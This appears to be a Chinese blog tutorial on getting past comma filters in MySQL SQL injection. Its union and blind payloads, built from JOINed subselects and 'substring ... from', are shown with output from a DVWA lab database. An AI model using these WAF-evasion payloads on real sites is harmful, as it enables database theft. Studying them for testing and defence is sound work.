小编给大家分享一下sql注入技巧之显注与盲注中过滤逗号绕过的示例分析,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!
1.联合查询显注绕过逗号
在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。
绕过
在显示位上替换为常见的注入变量或其它语句
union select 1,2,3; union select * from ((select 1)A join (select 2)B join (select 3)C); union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
UNION开始是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截
mysql> select user_id,user,password from users union select 1,2,3; +---------+-------+----------------------------------+ | user_id | user | password | +---------+-------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 1 | 2 | 3 | +---------+-------+----------------------------------+ 2 rows in set (0.04 sec)
不出现逗号,使用Join来注入
MysqL> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C); +---------+-------+----------------------------------+ | user_id | user | password | +---------+-------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 1 | 2 | 3 | +---------+-------+----------------------------------+ 2 rows in set (0.05 sec)
查询我们想要的数据
MysqL> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);; +---------+-------+-------------------------------------------------+ | user_id | user | password | +---------+-------+-------------------------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 1 | 2 | root@192.168.228.1 dvwa c:\PHPStudy\MysqL\data\ | +---------+-------+-------------------------------------------------+ 2 rows in set (0.08 sec)
2.盲注中逗号绕过
MysqL> select mid(user(),1,2); +-----------------+ | mid(user(),1,2) | +-----------------+ | ro | +-----------------+ 1 row in set (0.04 sec)
MysqL> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3; +---------+-------+----------------------------------+ | user_id | user | password | +---------+-------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 114 | 2 | 3 | +---------+-------+----------------------------------+ 2 rows in set (0.05 sec)
盲注,通过猜ascii值
MysqL> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ; Empty set MysqL> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ; +---------+-------+----------------------------------+ | user_id | user | password | +---------+-------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | +---------+-------+----------------------------------+ 1 row in set (0.04 sec)
逗号绕过SUBTTRING 函数
substring(str FROM pos)
从字符串str的起始位置pos 返回一个子串
MysqL> select substring('hello' from 1); +---------------------------+ | substring('hello' from 1) | +---------------------------+ | hello | +---------------------------+ 1 row in set (0.04 sec) MysqL> select substring('hello' from 2); +---------------------------+ | substring('hello' from 2) | +---------------------------+ | ello | +---------------------------+ 1 row in set (0.03 sec)
注入
MysqL> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ; Empty set //substring(user() from 2)为o //o的ascii为111, MysqL> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ; +---------+-------+----------------------------------+ | user_id | user | password | +---------+-------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | +---------+-------+----------------------------------+ 1 row in set (0.03 sec)
以上是“sql注入技巧之显注与盲注中过滤逗号绕过的示例分析”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注编程之家行业资讯频道!